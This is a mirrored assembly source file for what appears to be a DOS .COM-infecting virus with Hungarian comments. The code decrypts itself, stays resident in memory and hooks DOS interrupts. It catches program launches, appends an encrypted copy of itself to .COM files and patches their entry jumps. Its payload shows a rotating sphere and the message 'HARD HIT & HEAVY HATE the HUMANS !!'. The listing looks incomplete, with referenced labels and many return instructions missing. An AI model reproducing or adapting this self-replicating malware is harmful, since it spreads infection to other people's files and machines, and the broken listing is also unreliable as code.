mirror of
synced 2025-02-11 17:32:03 +00:00
902 lines
31 KiB
902 lines
31 KiB
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A' ;<3B>
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
it24: mov cs:attrflag,1
xor al,al
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
kisebb: add cs:did,512
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
rep stosw
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
mov cx,ax
shl cx,1
add cx,320
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
mov di,ax
mov bx,ax
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)